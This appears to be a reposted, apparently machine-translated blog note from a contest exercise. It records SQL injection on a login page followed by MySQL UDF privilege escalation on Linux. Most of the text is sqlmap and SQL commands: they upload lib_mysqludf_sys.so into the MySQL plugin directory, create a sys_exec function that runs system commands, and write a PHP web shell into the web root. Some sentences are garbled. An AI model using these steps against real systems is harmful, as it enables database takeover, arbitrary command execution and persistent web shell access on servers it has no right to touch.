Aquaboutic | Focus Security Research | Vulnerability Exploit | POC

Home

linux mysql udf rights

Posted by ulberg at 2020-02-26
all

A few days ago, there was a question in a small contest: a post injection vulnerability was found in the login page of a given test environment, so I decisively operated the sqlmap to run the data, and found that the current MySQL connection user was root, so I thought of UDF to raise the right. "Although MySQL under Windows basically has no question, it has never been successful under Linux. "The main problem is that MySQL runs with root permission." take notes as follows for future reference:

The specific steps are as follows

python sqlmap.py -u 'http://xxxx' --sql-shell

show variables like "%plugin%";

python sqlmap.py -u 'http://xxxx' --file-write=/lib_mysqludf_sys.so

--file-dest=/usr/lib/mysql/plugin/

python sqlmap.py -u 'http://xxxx' --sql-shell

CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so

SELECT * FROM information_schema.routines

sys_exec(id);

python sqlmap.py -u 'http://xxx'  --file-write=C:/phpspy.php --file-dest=/var/www/spy.php

testing environment

Reference material

[via @ network] Note: This article is reprinted from the network, and the source is not signed by the author. If the author sees this article, please leave a message and we will supplement it in time.

Update today + 1

Hackertools

Feature Tags